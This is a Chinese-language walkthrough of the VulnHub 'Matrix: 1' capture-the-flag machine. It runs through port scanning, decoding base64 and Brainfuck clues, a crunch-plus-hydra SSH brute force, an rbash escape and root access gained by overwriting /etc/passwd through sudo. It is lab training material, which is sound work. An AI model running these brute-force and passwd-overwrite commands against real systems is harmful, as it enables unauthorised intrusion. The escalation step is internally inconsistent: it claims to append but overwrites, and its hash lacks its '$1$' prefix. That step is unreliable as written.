VulnHub-MATRIX: 1
环境
Kali: 192.168.132.131
靶机:192.168.132.152 靶机地址:http://www.vulnhub.com/entry/matrix-1,259/
一、信息收集
arp-scan -l

nmap -p- -sC -sV 192.168.132.152

http://192.168.132.152:80/

查看源代码,发现一张图片

文件名为:p0rt_31337.png 发现31337端口有关

http://192.168.132.152:31337/

二、漏洞探测
查看源代码,查看加密内容,看密文可能是base64加密

解密,发现该网站下存在Cypher.matrix文件

访问并下载文件,用记事本打开
http://192.168.132.152:31337/Cypher.matrix

看密文为Brainfuck加密,进行解密

三、漏洞验证
查看密码库
cat /usr/share/crunch/charset.lst

制作密码字典
crunch 8 8 -f /usr/share/crunch/charset.lst lalpha-numeric -t k1ll0r@@ > password.dict

进行暴力破解ssh
hydra -l guest -P password.dict ssh://192.168.132.152:22 -I -f -V

四、提权
由于bash shell功能受限,需要绕过
参考文章 https://www.freebuf.com/articles/system/188989.html
尝试可使用的命令

尝试重新登录ssh,进行绕过rbash

成功绕过
ssh guest@192.168.132.152 -t "bash --noprofile"

查看可sudo的命令
sudo -l

生成密文
openssl passwd -1 -salt hack hack123

将/etc/passwd复制出来
sudo cp /etc/passwd passwd
将生成密文追加到passwd文件中
echo 'hack:1hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root:/bin/bash' > passwd
将passwd复制到/etc/覆盖原passwd文件
sudo cp passwd /etc/passwd
su - hack

寻找flag吗,并查看
cat flag.txt

五、总结
扫描端口发现web服务器,查看源代码发现31337端口,访问并查看源代码发现Cypher.matrix目录,进行Brainfuck解密,获得残缺的密码,使用crunch工具生成密码字典,破解ssh密码,bash shell功能受限,需要绕过rbash,利用sudo进行提权,获得root权限。

浙公网安备 33010602011771号